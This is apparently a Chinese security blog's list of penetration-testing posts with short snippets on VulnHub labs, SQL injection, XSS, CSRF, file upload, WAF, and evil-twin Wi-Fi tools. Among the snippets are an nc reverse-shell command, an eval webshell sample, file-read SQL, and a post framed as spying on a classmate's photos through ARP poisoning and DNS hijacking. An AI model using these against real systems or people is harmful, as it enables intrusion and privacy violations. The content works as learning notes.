渗透
文章平均质量分 80
信息安全
cc啊昂昂
阿巴阿巴
展开
-
VulnHub系列之BadStore_123渗透测试
BADSTORE: 1.2.3 早期网商系统漏洞鉴赏(2004)原创 2022-04-25 09:00:00 · 863 阅读 · 0 评论 -
VulnHub系列之ch4inrulz 渗透测试
CH4INRULZ_v1.0.1靶机地址:https://www.vulnhub.com/entry/ch4inrulz-101,247/弗兰克有一个小网站,他是一个聪明的开发人员,具有正常的安全背景,他总是喜欢遵循模式,你的目标是发现任何严重的漏洞并获得对系统的访问权限,然后你需要获得 root 访问权限才能捕获。根标志。这台机器是为 Jordan's Top hacker 2018 CTF 制作的原创 2021-04-26 19:28:55 · 385 阅读 · 0 评论 -
VulnHub系列之Lampiao渗透测试
Lampiao靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/您想继续在自己的实验室中进行黑客攻击吗?试试这个全新的易受攻击的机器!“兰皮奥 1”。原创 2021-04-26 15:53:16 · 408 阅读 · 0 评论 -
VulnHub系列之Jarbas渗透测试
jarbas虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/如果你想继续你的黑客研究,请试试这台机器!Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。目标:获取root shell!原创 2021-04-26 10:29:12 · 1075 阅读 · 0 评论 -
PHP无参函数
eg<?phpif(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);} else { show_source(__FILE__);}原创 2021-04-18 15:18:21 · 636 阅读 · 0 评论 -
利用Mysql导入恢复读取本地任意文件
前最近刷到一个题目,挺有意思的,以前没有见过,记录一下题目直接弱密码杀进后台,这个题目有很多文件上传点,但都使用了白名单,截断文件名也失败了.最后发现一个页面提供了恢复备份数据表的功能.这里就想到能不能去做一个读取本地flag文件然后写入到数据表中,再下载新的数据表这样就可以看到flag文件了.去搜了一下,想要读取本地文件有3种方法.insert into user('flag_value') values (load_file('/1.txt')) load data infile '原创 2021-04-11 12:45:31 · 131 阅读 · 0 评论 -
Session 会话劫持和cookie窃取
会话劫持会话劫持(Session hijacking),这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户思路攻击者不获取用户的cookie和session,而是想办法让用户在不知情的情况自己去踩坑。比如CSRF跨站脚本让已经被服务器验证通过的用户来帮攻击者完成危险操作。1.攻击者构造特殊的界面,请求修改密码。//evil.html<原创 2021-04-08 17:45:35 · 904 阅读 · 0 评论 -
目录穿越
目录穿越原创 2021-04-08 11:17:57 · 353 阅读 · 0 评论 -
NC获取系统权限
Netcat利用nc工具可以使命令注入攻击变得更加六匹命令注入思路总结反向 reverse shell反向shell是从目标主机发起到处于监听状态的攻击机器的shell连接方式,又叫被动连接nc实现shell反弹step1-攻击机开始监听本地端口 nc -lvp 4444step2-目标机向攻击机的端口提供shell,实现权限转移nc 192.168.43.175 4444 -e /bin/bash step3-当在攻击端看到收到连接后就说明已经得到了目标机器的部分shell了原创 2021-04-02 11:35:51 · 670 阅读 · 0 评论 -
PHP反序列化
序列化以PHP语言为例子,在写程序尤其是写网站的时候,经常会构造类,并且有时候会将实例化的类作为变量进行传输。序列化就是在此为了减少传输内容的大小孕育而生的一种压缩方法。我们知道一个PHP类都含有几个特定的元素: 类属性、类常量、类方法。每一个类至少都含有以上三个元素,而这三个元素也可以组成最基本的类。那么按照特定的格式将这三个元素表达出来就可以将一个完整的类表示出来并传递。序列化就是将一个类压缩成一个字符串的方法<?phpclass TEST{ public $a="public"; pr原创 2021-03-31 19:18:06 · 886 阅读 · 2 评论 -
PHP代码审计总结
AUDIT 启一切的用户输入都是有害的,危险的数据进入了危险的函数便产生了漏洞。从这2句话,不难看出审计的关键在于用户输入和函数因此 大概分出2类审计方法。跟踪用户的输入数据,检查代码运行的逻辑漏洞。检索危险的函数,分析其参数是否被用户输入控制,如果可以,就很有可能有漏洞。网站功能分析注册功能我们要根据需求列出服务器端需要接收的数据,假设有用户名、密码、邮箱、手机号等注销功能根据需要我们要回收令牌资源,保存用户操作以及状态(操作日志、当前用户等级等)。发表评论功能要判断原创 2021-03-29 19:16:52 · 440 阅读 · 0 评论 -
命令注入实战靶场分析(未通关靶场2)
通过对2个靶场的实战,总结命令注入的常用思路原创 2021-03-24 20:53:59 · 376 阅读 · 0 评论 -
CSRF靶场练习
Bodhi - Client-side Vulnerability Playground CSRF篇原创 2021-03-22 14:24:36 · 1830 阅读 · 0 评论 -
文件上传思路总结
思路总结当遇到js前端脚本限制上传文件类型使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell在前端js判断函数中加上可以上传php文件,或者直接删去这一函数首先把webshell的后缀改成允许上传的.jpg|.png|.gif,绕过JS检测。再抓包把后缀名改成.php,即可上传webshell当服务器检测上传文件的MIME类型即媒体类型时当上传PHP文件时,抓包发现Content-Type字段是application/x-php这时只要修改为其他值即可后端原创 2021-03-18 10:56:59 · 741 阅读 · 1 评论 -
AWD平台搭建与使用入门
简单介绍平台搭建因为平台已经做的比较集成化,所以安装还是很简单的。首先需要下载赛题项目git clone https://github.com/zhl2008/awd-platform#这一条命令可以将文件下载到当前工作目录,文件名为awd-platform因为项目地址是在github上面,所以对某些国内用户可能会有一些网络问题,这里博主搬运了一下,上传到csdn上面了。(点击前往)然后需要下载dockersudo apt install docker.io这里如果没有更换ap原创 2021-03-16 16:20:19 · 9877 阅读 · 11 评论 -
XSS总结
Xss总结思路总结当服务器未对输入值做任何过滤原样echo当页面保留输入值时当遇到对payload实体转换时当服务器对payload进行尖括号替换时当服务器对payload进行关键字替换时script,on事件过滤src data href 过滤payload必须包含关键词对空格和斜杠替换时当输入字段属性被隐藏时当payload不从浏览器获取时refere 字段--$_SERVER['HTTP_REFERER'];user agent字段--$_SERVER['HTTP_USER_AGENT'];html文原创 2021-03-12 16:26:37 · 235 阅读 · 0 评论 -
Sql基础注入总结
思路总结一般来说首先判断注入点是字符型或者时数值型字符型首先尝试参数带‘ “ ( %等特殊字符,而得到报错信息则很有可能是字符型原创 2021-03-12 16:22:51 · 184 阅读 · 0 评论 -
wifiphisher使用无法启动DHCP解决+自定义登陆界面
当wifiphisher建立一个AP时,目标机器一直无法得到一个IP连接到AP这是因为wifiphisher使用的端口被系统占用了,需要去把系统的服务停掉sudo systemctl disable systemd-resolved.servicesudo systemctl stop systemd-resolved重新发动攻击目标机就可以正常连接了!!!!攻击完后攻击机会上不了网,需要把刚刚关掉的服务打开!!!!sudo systemctl enable systemd-resolve原创 2020-10-23 18:49:01 · 1393 阅读 · 2 评论 -
fluxion 无法连接虚假AP热点,DHCP服务启动失败
记录一个使用fluxion时,无法连接至虚假AP的DHCP问题编辑/fluxion/attacks/Captive Portal/attack.shgedit fluxion/attacks/Captive\ Portal/attack.sh在1468行在dhcpd 的前面加上sudo2. 此时如果还是无法正常启动dhcp服务,那么需要停止apparmor守护进程sudo /etc/init.d/apparmor stop然后在使用root权限编辑/etc/apparmor.d/us原创 2020-10-23 13:39:13 · 4299 阅读 · 8 评论 -
偷偷远程窥视同班女孩的qq图片(arp中毒+dns劫持)
注:以下行为皆是在自己的机器上实现的,请勿攻击未授权的目标,这侵犯了人们的隐私权前言:首先来介绍一下我们要用到的工具Ettercap从英文翻译而来-Ettercap是在LAN人在这方面的中间人攻击自由和开放源码网络安全工具。它可用于计算机网络协议分析和安全审核。它可以在各种类Unix操作系统(包括Linux,Mac OS X,BSD和Solaris)以及Microsoft Windows上运行。它能够拦截网段上的流量,捕获密码并针对多种常见协议进行主动窃听。Driftnet监视网络流量,抓取网络原创 2020-10-14 20:55:22 · 890 阅读 · 1 评论 -
kali子系统渗透工具被查杀??(不用关闭实时防护)
前言:最近对这些花里胡哨的东西很感兴趣啊。这次是因为在尝试远程ipad控制电脑时,成功后ssh使用kali的时候出错了。然后对着windows安全中心看了好久,虽然知道只要关了实时防护之后就可以了,但是,,,关了不爽啊!!然后就发现了还有排除项这一个东西,再结合了一下报错信息,那么问题就轻松解决了打开windows安全中心----病毒和威胁防护打开病毒和威胁防护设置-----管理设置...原创 2020-04-08 20:51:27 · 482 阅读 · 0 评论 -
手机安装kali以及后续配置
前言:突然想在手机上安装一个kali,就去坐了,发现如果只是简单的安装系统的话,其实很简单。不过在后期下载的时候出现各种问题,大概重新装了三次左右的样子吧一.使用工具介绍termux:首先在手机上下载这个软件,官网(https://termux.com/)在官网也不能直接下载termux,说的是不安全,就可以先下载这个F-droid,类似于一个软件商店,第一次使用会要求更新软件包信息(软件...原创 2020-03-27 16:29:41 · 10274 阅读 · 11 评论 -
到底什么是WAF??
前言:本文将简单的介绍什么是WAF,如何判断WAF,如何简单的绕过WAF1.什么是WAFWeb Application Firewall(web应用防火墙),一种公认的说法是“web应用防火墙通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品。基本可以分为以下4种软件型WAF以软件的形式安装在服务器上面,可以接触到服务器上的文件,因此就可以检测服务...原创 2020-03-19 15:26:32 · 8134 阅读 · 0 评论